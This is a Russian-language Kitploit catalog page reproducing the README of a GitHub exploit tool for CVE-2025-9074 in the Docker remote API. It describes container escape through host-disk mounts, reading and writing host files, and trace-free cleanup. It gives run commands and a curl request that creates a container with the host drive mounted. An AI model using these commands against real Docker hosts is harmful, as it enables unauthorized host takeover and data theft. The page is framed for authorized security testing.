Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Container SecurityVulnerability AnalysisExploitationPenetration TestingCloud SecurityRed TeamingContainer Escape
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

Репозиторий
127 месяцев назадЕщё не проверено

CVE-2025-9074 Инструмент для выполнения команд в контейнерах Docker

Мощный инструмент для эксплуатации удаленного API Docker, предназначенный для исследования безопасности и тестирования уязвимости CVE-2025-9074.

Ключевые преимущества

✅ Полностью автоматизированное управление жизненным циклом контейнеров: автоматическое создание временных контейнеров, автоматическая очистка после завершения операций, без следов
✅ Интеллектуальная обработка путей: автоматическое распознавание и преобразование путей Windows в формат монтирования Docker
✅ Полностью автоматизированный рабочий процесс: без необходимости ручного ввода сложных команд, меню-ориентированное взаимодействие, выполнение операций с файлами в один клик
✅ Кроссплатформенная совместимость: идеальная поддержка Windows и Linux

Иллюстрация некоторых функций

image

Функциональные возможности

  • Операции с контейнерами

    • Просмотр запущенных контейнеров
    • Просмотр всех контейнеров (включая остановленные)
    • Создание нового контейнера
    • Остановка контейнера
    • Удаление контейнера
    • Однократное выполнение команды
    • Интерактивный терминал (требуется библиотека docker)
  • Управление образами

    • Просмотр локальных образов
    • Загрузка нового образа
    • Удаление образа
  • Операции с файлами на хосте

    • Загрузка файла на хост
    • Скачивание файла с хоста
    • Чтение содержимого файла на хосте
    • Запись файла на хост
    • Автоматическая обработка сопоставления путей для Windows Docker Desktop

Описание уязвимости

CVE-2025-9074 — это уязвимость безопасности удаленного API Docker. Злоумышленник может, используя неавторизованный доступ к Docker API:

  • выполнять произвольные команды
  • создавать контейнеры и монтировать диски хоста
  • осуществлять побег из контейнера
  • читать/записывать файлы на хосте

Требования к окружению

  • Python 3.6+

Установка зависимостей

Установка всех зависимостей с помощью requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Или вручную:

root@kitploit:~
pip install requests docker websocket-client

Использование

Базовое использование

Запуск скрипта с адресом Docker API по умолчанию:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Пользовательский адрес Docker API

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Параметры командной строки

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [опции]

Опции:
  -u, --url URL         Адрес Docker API (по умолчанию: http://192.168.65.7:2375)

Подробное описание функций

Операции с контейнерами

  1. Просмотр запущенных контейнеров: отображает список всех работающих контейнеров
  2. Просмотр всех контейнеров: отображает все контейнеры (включая остановленные)
  3. Создание нового контейнера: создает новый контейнер из указанного образа
  4. Остановка контейнера: останавливает работающий контейнер
  5. Удаление контейнера: удаляет контейнер (возможно принудительное удаление)
  6. Однократное выполнение команды: выполняет одну команду в контейнере
  7. Интерактивный терминал: входит в интерактивную оболочку контейнера (требуется библиотека docker)

Использование интерактивного терминала

  1. После запуска скрипта выберите "1. Операции с контейнерами"
  2. Выберите "1. Просмотр запущенных контейнеров"
  3. Введите номер контейнера для выбора
  4. Выберите "2. Интерактивный терминал (требуется библиотека docker)"
  5. Введите команду оболочки (по умолчанию: /bin/sh)
  6. Начните интерактивную работу

Управление образами

  1. Просмотр образов: выводит список всех локальных образов
  2. Загрузка образа: загружает новый образ из Docker Hub
  3. Удаление образа: удаляет локальный образ

Операции с файлами на хосте

Загрузка файла на хост

root@kitploit:~
1. Загрузка файла на хост
Введите локальный путь к файлу: /path/to/local/file.txt
Введите целевую директорию на хосте: D:/temp
Введите имя целевого файла (оставьте пустым для сохранения оригинального имени): 

Скачивание файла с хоста

root@kitploit:~
2. Скачивание файла с хоста
Введите путь к файлу на хосте: D:/temp/file.txt
Введите локальный путь для сохранения: /tmp

Чтение содержимого файла на хосте

root@kitploit:~
3. Чтение содержимого файла на хосте
Введите путь к файлу на хосте: D:/temp/file.txt

Запись файла на хост

root@kitploit:~
4. Запись файла на хост
Введите целевую директорию на хосте: D:/temp
Введите содержимое файла: Hello, World!

Сопоставление путей для Windows Docker Desktop

Инструмент автоматически обрабатывает сопоставление путей для Windows Docker Desktop:

Путь Windows

Поддерживаемые форматы ввода:

  • D:\ или D:/
  • D:\temp или D:/temp
  • "D:\file.txt" (в кавычках)
  • 'D:/file.txt' (в кавычках)

Меры безопасности

⚠️ Важное замечание:

  1. Используйте только для авторизованного тестирования: данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей
  2. Соблюдайте законодательство: перед использованием убедитесь, что получено явное разрешение от владельца целевой системы
  3. Изолированное окружение: рекомендуется использовать в изолированной тестовой среде
  4. Ограничения прав: для записи на диск C в Windows Docker Desktop требуется запуск от имени администратора
  5. Не злоупотребляйте: неавторизованное использование данного инструмента может нарушать законодательство

Технические принципы

Побег из контейнера

Создание контейнера и монтирование диска хоста через Docker API:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Чтение и запись файлов

Чтение и запись файлов на хосте с помощью выполнения команд в контейнере:

root@kitploit:~
# Запись файла
echo "content" > /tmp/file.txt

# Чтение файла
cat /tmp/file.txt

Устранение неполадок

Ошибка создания контейнера (500)

  • Проверьте доступность Docker API
  • Убедитесь в правильности формата путей
  • Проверьте существование образа

Ошибка записи файла

  • Для Windows Docker Desktop требуется запуск от имени администратора
  • Проверьте права доступа к целевой директории

Не удаётся запустить интерактивный терминал

  • Убедитесь, что установлена библиотека docker: pip install docker websocket-client
  • Проверьте поддержку интерактивного режима терминалом

Разработка и тестирование

Запуск тестов

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Структура кода

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── Функции управления контейнерами
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── Функции управления образами
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── Функции работы с файлами на хосте
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── Вспомогательные функции
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Вклад

Приветствуются Issues и Pull Requests!

Лицензия

Данный проект предназначен только для образовательных целей и исследований в области безопасности.

Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Пользователь самостоятельно несёт всю ответственность и риски, связанные с использованием данного инструмента. Автор не несёт ответственности за любое злоупотребление или неавторизованное использование данного инструмента.

Справочные материалы

  • Подробности уязвимости CVE-2025-9074
  • Документация Docker Remote API
  • Правила сопоставления путей Windows Docker Desktop
Скачать инструмент
Путь монтирования Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test